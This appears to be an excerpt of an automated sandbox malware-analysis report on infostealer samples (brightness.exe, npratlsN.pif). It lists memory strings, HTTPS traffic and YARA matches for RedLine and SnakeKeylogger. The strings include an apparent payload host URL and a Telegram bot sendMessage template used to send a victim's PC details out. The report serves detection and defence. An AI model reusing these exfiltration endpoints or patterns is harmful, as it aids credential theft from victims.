Source: brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2241546337.0000000021D71000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2277598255.0000000021E1B000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2277009105.0000000021800000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2242163340.000000007F43A000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.0000000020460000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2216601555.000000007F62F000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000204F0000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 00000010.00000002.2482451684.0000000020595000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif.7.dr	String found in binary or memory: http://www.pmail.com0
Source: npratlsN.pif, 0000000D.00000003.2812427114.000000001F1D9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3861251600.000000001F140000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CC7A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CC96000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2928544719.000000002B8F6000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9F5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3847403141.000000002B8B2000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002DA1F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3847403141.000000002B8F6000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998497674.00000000267E7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998598056.000000002B3B5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998497674.00000000267A9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.000000002853D000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3862857425.000000002B3B5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3847686800.0000000026796000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028565000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3847686800.00000000267E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: npratlsN.pif, 0000000D.00000003.2812427114.000000001F1D9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3861251600.000000001F140000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CC7A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CC96000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2928544719.000000002B8F6000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9F5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3847403141.000000002B8B2000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002DA1F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3847403141.000000002B8F6000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998497674.00000000267E7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998598056.000000002B3B5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2998497674.00000000267A9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.000000002853D000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3862857425.000000002B3B5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3847686800.0000000026796000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028565000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3847686800.00000000267E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: npratlsN.pif, 0000000D.00000002.3856159190.000000001DE46000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3857060736.000000002EBB6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3855219862.00000000296D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: brightness.exe, 00000007.00000002.2244059195.00000000006BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amazonenviro.com/
Source: brightness.exe, 00000007.00000002.2273645981.000000002056D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://amazonenviro.com/admin/2
Source: brightness.exe, 00000007.00000002.2273645981.000000002054F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.0000000020547000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2244059195.000000000066E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amazonenviro.com/admin/245_Nsltarpncon
Source: brightness.exe, 00000007.00000002.2244059195.000000000069F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amazonenviro.com/admin/245_NsltarpnconC
Source: brightness.exe, 00000007.00000002.2244059195.000000000066E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amazonenviro.com/admin/245_Nsltarpncon_56
Source: brightness.exe, 00000007.00000002.2244059195.000000000066E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amazonenviro.com:443/admin/245_Nsltarpncon
Source: npratlsN.pif, 0000000D.00000002.3852283482.000000001CC41000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9BA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.00000000284EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: npratlsN.pif, 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3852283482.000000001CC41000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9BA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.00000000284EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: npratlsN.pif, 0000000D.00000002.3852283482.000000001CC41000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9BA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.00000000284EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: npratlsN.pif, 0000000D.00000002.3852283482.000000001CC41000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9BA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.00000000284EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20a
Source: npratlsN.pif, 0000000D.00000002.3856159190.000000001DE46000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3857060736.000000002EBB6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3855219862.00000000296D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: npratlsN.pif, 0000000D.00000002.3856159190.000000001DE46000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3857060736.000000002EBB6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3855219862.00000000296D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: npratlsN.pif, 0000000D.00000002.3856159190.000000001DE46000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3857060736.000000002EBB6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3855219862.00000000296D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: npratlsN.pif, 00000011.00000002.3850452895.0000000028580000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.00000000285B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: npratlsN.pif, 00000011.00000002.3850452895.0000000028580000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enDz
Source: npratlsN.pif, 0000000D.00000002.3852283482.000000001CCBA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002DA3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enLz
Source: npratlsN.pif, 0000000D.00000002.3852283482.000000001CCB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlBsq
Source: npratlsN.pif, 0000000D.00000002.3856159190.000000001DE46000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3857060736.000000002EBB6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3855219862.00000000296D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: npratlsN.pif, 0000000D.00000002.3856159190.000000001DE46000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3857060736.000000002EBB6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3855219862.00000000296D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: npratlsN.pif, 0000000D.00000002.3856159190.000000001DE46000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3857060736.000000002EBB6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3855219862.00000000296D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: npratlsN.pif, 0000000D.00000002.3852283482.000000001CC41000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9BA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D931000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D999000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028452000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.00000000284EB000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.00000000284C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: npratlsN.pif, 0000000D.00000002.3852283482.000000001CBC1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D931000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.0000000028452000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: npratlsN.pif, 00000011.00000002.3850452895.00000000284C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: npratlsN.pif, 0000000D.00000002.3852283482.000000001CC41000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D9BA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002D999000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.000000002847C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.00000000284EB000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.00000000284C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: npratlsN.pif, 0000000D.00000002.3852283482.000000001CC41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.1894
Source: brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: npratlsN.pif, 0000000D.00000002.3856159190.000000001DE46000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3857060736.000000002EBB6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3855219862.00000000296D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: npratlsN.pif, 0000000D.00000002.3856159190.000000001DE46000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3857060736.000000002EBB6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3855219862.00000000296D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: npratlsN.pif, 00000011.00000002.3850452895.00000000285B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: npratlsN.pif, 00000011.00000002.3850452895.00000000285A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/(
Source: npratlsN.pif, 00000011.00000002.3850452895.00000000285B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/Dz
Source: npratlsN.pif, 0000000D.00000002.3852283482.000000001CCEB000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002DA6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/Lz
Source: npratlsN.pif, 0000000F.00000002.3853601584.000000002DA5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/P
Source: npratlsN.pif, 0000000D.00000002.3852283482.000000001CCE6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3853601584.000000002DA66000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3850452895.00000000285AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lBsq

Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901

Source: unknown	HTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50038 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 17.2.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.1.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 15.1.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.1.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.2.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 15.2.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.Nsltarpn.PIF.20f567a8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 15.2.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 15.2.npratlsN.pif.2fd20000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.npratlsN.pif.2fd20000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.npratlsN.pif.2fd20000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.npratlsN.pif.1f7f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.npratlsN.pif.2812a8ee.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.npratlsN.pif.2812a8ee.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.npratlsN.pif.2812a8ee.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.npratlsN.pif.1f7f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.npratlsN.pif.1f7f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.npratlsN.pif.2fd20000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.npratlsN.pif.2fd20000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.npratlsN.pif.2fd20000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.1.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 15.2.npratlsN.pif.304b0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.npratlsN.pif.304b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.npratlsN.pif.304b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.npratlsN.pif.304b0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.npratlsN.pif.304b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.npratlsN.pif.304b0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.npratlsN.pif.2d63a8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.npratlsN.pif.2d63a8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.npratlsN.pif.2d63a8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.npratlsN.pif.2d639a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.npratlsN.pif.2d639a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.npratlsN.pif.2d639a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 17.1.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.npratlsN.pif.2aa40000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.npratlsN.pif.2aa40000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.npratlsN.pif.2aa40000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 13.2.npratlsN.pif.1efb0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.npratlsN.pif.1efb0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.npratlsN.pif.1efb0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 17.2.npratlsN.pif.2b0c0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.npratlsN.pif.2b0c0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
